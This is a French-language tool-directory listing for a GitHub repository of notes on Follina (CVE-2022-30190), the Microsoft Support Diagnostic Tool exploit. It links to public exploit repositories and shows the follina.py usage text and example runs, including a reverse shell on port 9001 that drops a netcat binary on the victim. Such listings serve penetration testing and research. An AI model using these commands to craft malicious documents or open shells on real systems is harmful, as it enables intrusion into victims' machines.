Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Follina — Notes related to CVE-2022-30190 | Kitploit
Outils/GitHubGitHub/abhirules27/follina
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRed Teaming
GitHubabhirules27/follina

Follina

Notes related to CVE-2022-30190

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Follina

Notes relatives à CVE-2022-30190

FOLLINA : CVE-2022-30190

  1. Utilise l'outil de diagnostic du support Microsoft (MSDT)

  2. Exploite la fenêtre de diagnostic ouverte pour le diagnostic et, lorsqu'il est exécuté correctement, donne un shell inversé à l'attaquant.

  3. Github : (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py

  4. Remerciements à : (a). @_johnhammond (b). @networkchuck

  5. Utilisation follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND command to run on the target (default: calc) --output OUTPUT, -o OUTPUT output maldoc file (default: ./follina.doc) --interface INTERFACE, -i INTERFACE network interface or IP address to host the HTTP server (default: eth0) --port PORT, -p PORT port to serve the HTTP server (default: 8000)

  6. Exemples (a). Lancer calc.exe : $ python3 follina.py
    [+] copied staging doc /tmp/9mcvbrwo [+] created maldoc ./follina.doc [+] serving html payload on :8000 (b). Lancer notepad.exe : $ python3 follina.py -c "notepad" (c). Obtenir un shell inversé sur le port 9001. Notez que cela télécharge un binaire netcat sur la victime et le place dans C:\Windows\Tasks. Il ne nettoie pas le binaire. Cela déclenchera les détections antivirus sauf si l'antivirus est désactivé. $ python3 follina.py -r 9001

Télécharger l’outil